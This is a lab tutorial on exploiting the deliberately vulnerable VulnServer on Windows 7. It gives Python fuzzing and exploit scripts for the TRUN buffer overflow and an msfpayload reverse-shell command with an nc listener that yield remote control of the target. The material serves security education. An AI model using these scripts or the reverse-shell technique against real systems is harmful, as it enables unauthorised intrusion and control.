= Exploiting "Vulnerable Server" for Windows 7

Exploiting "Vulnerable Server" for Windows 7

Purpose

Learn how to exploit a simple buffer overflow vulnerability to gain Remote Code Execution on Windows 7.

We will use these tools:

What You Need

WARNING

VulnServer is unsafe to run. The Windows 7 machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your windows machine.

Overview

This project guides you through all the steps of developing a Windows exploit, using a program that deliberately has a simple buffer overflow vulnerability.

Here are the steps of the process:

Preparing the Vulnerable Server

On your Windows 7 machine, open a Web browser and go to

http://sites.google.com/site/lupingreycorner/vulnserver.zip

If that link doesn't work, try this alterative download link.

Save the "vulnserver.zip" file on your desktop.

On your desktop, right-click vulnserver.zip.

Click "Extract All...", Extract.

A "vulnserver" window opens. Double-click vulnserver. The Vulnserver application opens, as shown below.

Turning Off Windows Firewall

On your Windows 7 desktop, click Start.

In the Search box, type FIREWALL

Click "Windows Firewall".

Turn off the firewall for both private and public networks.

Finding your Windows 7 Machine's IP Address

On your Windows 7 Machine, open a Command Prompt. Execute the IPCONFIG command. Find your IP address and make a note of it.

Testing the Server

On your Kali Linux machine, in a Terminal window, execute this command:

Replace the IP address with the IP address of your Windows 7 machine.

nc 192.168.119.129 9999
You should see a banner saying "Welcome to Vulnerable Server!", as shown below.

Type HELP and press Enter. You see a lot of commands. None of these actually do anything useful, but they do take input and process it.

This server has many vulnerabilities, but the one we'll use now is in the TRUN command.

On your Kali Linux machine, in the Terminal window, type TRUN .AAA and press Enter.

The server responds saying "TRUN COMPLETE", as shown below.

On your Kali Linux machine, in the Terminal window, type EXIT and press Enter to close your connection to Vulnerable Server.

Fuzzing the Server

On your Kali Linux machine, in a Terminal window, execute this command:
nano vs-fuzz1
In the nano window, type or paste this code. This is a simple Python script that does the same thing you just did--it connects to the server and executes a TRUN command with a specified number of "A" characters.

Replace the IP address with the IP address of your Windows 7 machine.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-fuzz1
In the Terminal window, execute this command to run the fuzzer:
./vs-fuzz1
Enter a "Length of Attack" of 100 and press Enter.

The server responds "TRUN COMPLETE", as shown below.

Run the fuzzer again, but this time enter a length of 9000.

There is no response, as shown below.

Look at your Windows 7 desktop.

An error message says "vulnserver.exe has stopped working", as shown below.

Restarting the Vulnerable Server

On your Windows server, close the "vulnserver.exe has stopped working" box.

Double-click vulnserver to start the server again.

Try other lengths. You will find that it crashes for lengths of both 2000 and 3000. Each time it crashes, restart the server.

The crash is different in these cases, as we'll see below.

Installing the Immunity Debugger

We need more information about the crash, in order to exploit it. To get that information, we'll use the Immunity Debugger.

On your Windows server, open a Web browser and go to

http://debugger.immunityinc.com/ID_register.py

Fill in the form. Use fake information if you like.

Click the Download button. Save the file. The file is 22.7 MB in size.

When the download completes, double-click the ImmunityDebugger_1_85_setup file and install the software with the default options. It will also install Python.

Starting Immunity and Attaching a Process

On your Windows desktop, right-click the "Immunity Debugger" and click "Run as Administrator".

In the "User Account Control" box, click Yes.

Immunity Debugger runs, with four black panes, as shown below.

Make your Windows desktop large, and drag the borders of the panes so you can see all four of them, as shown below.

Now we will attach a running process to Immunity. That will encapsulate the process inside Immunity, so Immunity can examine and control the process.

From the Immunity Debugger menu bar, click File, Attach.

In the "Select process to attach" box, click vulnserver, as shown below, and click the Attach button.

Adjusting the Immunnity Appearance

The Immunity panes fill with tiny text, as shown below. This is too much information to grasp immediately, and too hard to read.

To make the text more readable, position the mouse pointer somewhere in the top left pane and right-click.

In the context menu, click Appearance, "Font (all)", "OEM fixed font", as shown below.

The font becomes clearer, as shown below.

In the lower left pane, right-click and click Hex, "Hex/ASCII (16 bytes)", as shown below.

Understanding the Immunity Window

This is the "CPU Window" in Immunity, and it's the one you will use most of the time.

Locate these items in your Immunity window, as marked in the image below.

Status in the lower right corner: this shows if the program is Paused or Running. When Immunity attaches a process, the process starts in the Paused state.

Current Instruction in the lower left: this shows exactly which instruction the process is executing right now. Immunity has automatically assigned a breakpoint at the start of the process and right now its execution has paused there.

Registers in the upper right: The most important items here are:

Assembly Code in the upper left: This is the most difficult part of the window to understand. It shows the processor instructions one at a time in "Assembly Language", with instructions like MOV and CMP. Assembly language is difficult to learn, but you don't need to learn much of it to develop simple exploits. Don't struggle much with this pane at first.

Hex Dump at the lower left: this shows a region of memory in hexadecimal on the left and in ASCII on the right. For simple exploit development, we'll use this pane to look at targeted memory regions, usually easily labelled with ASCII text.

Stack in the lower right. This shows the contents of the Stack, but it's presented in a way that is not very helpful for us right now. For this project, disregard this pane.

If you are ready to learn more about these panes and their contents, see the "Debugging Fundamentals for Exploit Development" tutorial in the "Sources" section at the bottom of this project.

Running the Vulnerable Server in Immunity

On your Windows desktop, in the Immunity Debugger window, at the top left, click the magenta Run Button, as shown below. This runs the Vulnerable Server inside the debugger, so we can attack it.

The Status at the lower right changes to "Running".

Observing a Crash in the Immunity Debugger

On your Kali Linux machine, in a Terminal window, execute this command:
./vs-fuzz1
Enter a "Length of Attack" of 2000 and press Enter.

The server doesn't respond. because it is crashing.

On your Windows 7 machine, in the Immunity window, at the lower left, you see "Access violation when writing to [41414141], as shown below.

"41" is the hexadecimal code for the "A" character, as shown below.

This means that the 'A' characters you sent were somehow misinterpreted by the server as an address to write data to. Addresses are 32 bits long, which is 4 bytes, and 'A' is 41 in hexadecimal, so the address became 41414141.

This is a vulnerability that could be exploited, but it's not the sort of vulnerability to start with.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator".

In the User Account Control box, click Yes.

Maximize the Immunity window.

In Immunity, click File, Attach.

Click vulnserver and click Attach.

Click the "Run" button.

Verify that the status in the lower right corner is "Running", as shown below.

Sending 3000 'A' Characters

On your Kali Linux machine, in a Terminal window, execute this command:
./vs-fuzz1
Enter a "Length of Attack" of 3000 and press Enter.

On your Windows 7 machine, in the Immunity window, at the lower left, you see "Access violation when executing [41414141], as shown below.

This is a classic buffer overflow exploit--the injected characters are placed into the EIP when a subroutine returns, so they become the address of the next instruction to be executed.

41414141 is not a valid address, so Immunity detects that the program is crashing and pauses so you can see what's happening.

This is common in exploit development--an attack of one length has different results than an attack of a different length.

From now on, we'll use a length of 3000 for all attacks.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.

In Immunity, click File, Attach. Click vulnserver and click Attach.

Click the "Run" button.

Creating a Nonrepeating Pattern of Characters

We know that four of the 'A' characters ended up in the EIP, but which ones?

To find out, we'll use a nonrepeating pattern of characters.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-eip0
In the nano window, type or paste this code. This is a simple Python script creates a simple pattern of four-byte sequences and prints it out so you can see it.
#!/usr/bin/python

chars = ''
for i in range(0x30, 0x35):
	for j in range(0x30, 0x3A):
		for k in range(0x30, 0x3A):
			chars += chr(i) + chr(j) + chr(k) + 'A'
print chars

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip0
On your Kali Linux machine, in a Terminal window, execute this command:
./vs-eip0
As you can see, the pattern is simple--a three digit number followed by 'A'.

If I add spaces for clarity, the pattern is like this:

000A 001A 002A 003A 004A 
             ...
250A 251A 252A 253A 254A 
             ...
495A 496A 497A 498A 499A
There are 500 groups of 4 characters, from 000A to 499A, for a total of 2000 bytes.

Sending the Nonrepeating Pattern to the Server

On your Kali Linux machine, in a Terminal window, execute this command:
nano vs-eip1
In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This will send a 3000-byte attack to the server, consisting of 1000 'A' characters followed by the 2000-byte nonrepeating pattern.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 1000
chars = ''
for i in range(0x30, 0x35):
	for j in range(0x30, 0x3A):
		for k in range(0x30, 0x3A):
			chars += chr(i) + chr(j) + chr(k) + 'A'
attack = prefix + chars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip1
On your Kali Linux machine, in a Terminal window, execute this command:
./vs-eip1
The lower left corner of the Immunity window now says "Access violation when executing [35324131]", as shown below.

Let's convert that hex to characters:

Hex  Character
---  ---------
 35      5
 32      2
 41      A
 31      1
So the characters are '52A1'. However, Intel processors are "Little Endian", so addresses are inserted in reverse order, so the actual characters that were placed into the EIP were '1A25'.

Those bytes appear here:

That's this portion of the input string (with spaces added again, for clarity):

The pattern '1A25' occurs after 251 four-byte fields + 2 more bytes, or 251 x 4 + 2 = 1004 + 2 = 1006 bytes.

Our attack used 1000 'A' characters before the nonrepeating pattern, so the EIP contains the four bytes after the first 2006 bytes in the attack.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.

In Immunity, click File, Attach. Click vulnserver and click Attach.

Click the "Run" button.

Targeting the EIP Precisely

We can now write a program that exactly hits the EIP.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-eip2
In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This program will send a 3000-byte attack to the server, consisting of 2006 'A' characters followed by 'BCDE' which should end up in the EIP, and enough 'F' characters to make the total 3000 bytes long.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
padding = 'F' * (3000 - 2006 - 4)
attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip2
On your Kali Linux machine, in a Terminal window, execute this command:
./vs-eip2
The lower left corner of the Immunity window now says "Access violation when executing [45444342]", as shown below.

This is success--those hex values are 'BCDE' in reverse order.

Examining Memory at ESP

Let's see what ended up at the location pointed to by ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.

Then right-click the highlighted value and click "Follow in Dump".

Look in the lower left pane of Immunity. It's full of the 'F' characters we put at the end of the exploit text. That's going to be very important later--we'll put our exploit code here.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.

In Immunity, click File, Attach. Click vulnserver and click Attach.

Click the "Run" button.

The Problem of Bad Characters

This exploit relies on tricking the program by inserting code into a data structure that was not intended to hold code--it's something else, such as a directory name.

Just from common sense, one might expect these characters to cause trouble:

Hex  Dec  Description
---  ---  ---------------------------------------------
0x00   0  Null byte, terminates a C string 
0x0A  10  Line feed, may terminate a command line 
0x0D  13  Carriage return, may terminate a command line 
0x20  32  Space, may terminate a command line argument
Not all these characters are always bad, and there might be other bad characters too. So the next task is to try injecting them and see what happens.

Testing for Bad Characters

On your Kali Linux machine, in a Terminal window, execute this command:
nano vs-badchar1
In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This program will send a 3000-byte attack to the server, consisting of 2006 'A' characters followed by 'BCDE' which should end up in the EIP, then all 256 possible characters, and finally enough 'F' characters to make the total 3000 bytes long.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
	testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-badchar1
On your Kali Linux machine, in a Terminal window, execute this command:
./vs-badchar1
The lower left corner of the Immunity window says "Access violation when executing [45444342]" again.

To see if the characters we injected made it into the program or not, we need to examine memory starting at ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.

Then right-click the highlighted value and click "Follow in Dump".

Look in the lower left pane of Immunity. The first byte is 00, but none of the other characters made it into memory, not the other 255 bytes or the 'F' characters. That happened because the 00 byte terminated the string. '\x00' is a bad character.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.

In Immunity, click File, Attach. Click vulnserver and click Attach.

Click the "Run" button.

Testing Again for Bad Characters

On your Kali Linux machine, in a Terminal window, execute this command:
nano vs-badchar2
In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This program skips the null byte, and includes all the other 255 bytes in the attack string, before the 'F' characters.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(1, 256):
	testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-badchar2
On your Kali Linux machine, in a Terminal window, execute this command:
./vs-badchar2
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.

Then right-click the highlighted value and click "Follow in Dump".

Look in the lower left pane of Immunity.

All the bytes from 01 to FF appear in order, followed by 'F' characters (46 in hexadecimal).

There are no other bad bytes--only '\x00'.

Finding Useful Assembly Code

We have control over the EIP, so we can point to any executable code we wish. What we need to do is find a way to execute the bytes at the location in ESP.

There are two simple instructions that will work: "JMP ESP" and the two-instruction sequence "PUSH ESP; RET".

To find these instructions, we need to examine the modules loaded when Vulnerable Server is running.

Installing MONA

MONA is a python module which gives Immunity the ability to list modules and search through them.

On your Windows machine, open Internet Explorer, and open this page:

http://redmine.corelan.be/projects/mona

In the "Download" section, right-click the "here"link below, and click "Save Target As". Save the file in your Downloads folder.

Alternate Download Link

mona.7z

On the taskbar, click the yellow folder icon to open Windows Explorer. Navigate to your Downloads folder. Right-click mona and click Copy, as shown below.

In Windows Explorer, in the left pane, expand the Computer container.

If you are using a 64-bit system, navigate to:

C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands

IIf you are using a 32-bit system, navigate to:

C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

In the right pane of Windows Explorer, right-click and click Paste.

A box pops up saying "You'll need to provide administrator permission...". Click Continue.

Mona appears in the window, as shown below.

Attaching Vulnerable Server in Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.

In Immunity, click File, Attach. Click vulnserver and click Attach.

Don't click the "Run" button yet--it's easier to use Mona with the program Paused.

Listing Modules with Mona

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona modules
The window fills with tiny green text. as shown below.

Right-click an empty portion of the window and click Appearance, Font, "OEM Fixed Font, as shown below.

Focus on the chart at the bottom, as shown below.

This chart shows all the modules loaded as part of Vulnerable Server, and several important properties for each one.

The property of most importance to us now is ASLR, which causes the address of the module to vary each time it is restarted.

Another property that can cause trouble is "Rebase", which relocates a module if another module is already loaded in its preferred memory location.

To make the most reliable exploit, we want to use a module without ASLR or Rebase.

There are two modules with "False" in both the Rebase and ASLR columns: essfunc.dll and vulnserver.exe.

However, notice the address values at the left of the chart--vulnserver.exe is loaded at very low address values, starting with 0x00, so any reference to addresses within vulnserver.exe will require a null byte, and that won't work because '\x00' is a bad character.

So the only usable module is essfunc.dll.

Finding Hex Codes for Useful instruction

Kali Linux contains a handy utility for converting assembly language to hex codes.

In Kali Linux, in a Terminal window, execute this command:

locate nasm_shell
The utility is located in a metasploit-framework directory, as shown below.

Copy and paste in the complete utility path to execute it.

Once nasm starts, type JMP ESP and press Enter to convert it to hexadecimal codes, as shown below.

Then type in POP ESP and press Enter.

Then type in RET and press Enter.

Then type in EXIT and press Enter.

The hexadecimal code for a "JMP ESP" instruction is FFE4.

The hexadecimal code for the two-instruction sequence "POP ESP; RET" is 5CC3.

If we can find either of those byte sequences in essfunc.dll, we can use them to run our exploit.

Finding JMP ESP with MONA

In Immunity, at the bottom, execute this command in the white bar.

!mona find -s "\xff\xe4" -m essfunc.dll
This searches the essfunc.dll module for the bytes FFE4.

9 locations were found with those contents, as shown below.

We'll use the first location:

625011af

Starting Vulnerable Server in Immunity

In Immunity, you are looking at the "Log window", with the green text Mona made. Close that window.

Now you should see the normal view, which is the "CPU window", as shown below.

Click the "Run" button. The Status at the lower right should say "Running", as shown below.

Testing Code Execution

Now we'll send an attack that puts the JMP ESP address (625011af) into the EIP.

That will start executing code at the location ESP points to.

Just to test it, we'll put some NOP instructions there ('\x90' = No Operation -- they do nothing) followed by a '\xCC' INT 3 instruction, which will interrupt processing.

The NOP sled may seem unimportant, but it's needed to make room to unpack the Matasploit packed exploit code we'll make later.

If this works, the program will stop at the '\xCC' instruction.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-eip3
In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip3
On your Kali Linux machine, in a Terminal window, execute this command:
./vs-eip3
The lower left corner of the Immunity window now says "INT 3 command", as shown below.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.

Then right-click the highlighted value and click "Follow in Dump".

The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte.

This is working! We are able to inject code and execute it.

Restarting the Vulnerable Server without Immunity

Close Immunity.

Double-click vulnserver to restart it.

Don't bother to use the debugger now--if everything is working, the exploit will work on the real server.

Preparing the Python Attack Code

This program sets up the exploit, but at the moment the exploit code is missing.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-shell
In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = (

)
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Creating Exploit Code

On your Kali Linux machine, in a Terminal window, execute this command.
ifconfig
Find your Kali machine's IP address and make a note of it.

On your Kali Linux machine, in a Terminal window, execute the command below.

Replace the IP address with the IP address of your Kali Linux machine.

msfpayload windows/shell_reverse_tcp LHOST="192.168.119.129" LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai
This command makes an exploit that will connect from the Windows target back to the Kali Linux attacker on port 443 and execute commands from Kali.

The exploit is encoded to avoid null bytes. because '\x00' is a bad character.

Use the mouse to highlight the exploit code, as shown below. Right-click the highlighted code and click Copy.

Inserting the Exploit Code into Python

On your Kali Linux machine, in a Terminal window, execute this command:
nano vs-shell
Use the down-arrow key to move the cursor into the blank line below this line:
exploit = (
Right-click and click Paste, as shown below.

The exploit code appears in the file, as shown below.

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-shell

Starting a Listener

On your Kali Linux machine, open a new Terminal window and execute this command:
nc -nlvp 443
This starts a listener on port 443, to take control of the Windows target.

Running the Exploit

On your Kali Linux machine, in a Terminal window, execute this command:
./vs-shell
In Kali Linux, the other Terminal window shows a Windows prompt, as shown below. You now control the Windows machine!

Sources

Debugging Fundamentals for Exploit Development

Stack Based Buffer Overflow Tutorial, part 1 – Introduction

Introducing Vulnserver

Offensive Security Certified Professional classes

MinHook - The Minimalistic x86/x64 API Hooking Library (Good JMP Examples)

Msfpayload


Posted 6-28-14 1:07 pm by Sam Bowne
Last revised 2:06 pm 12-16-14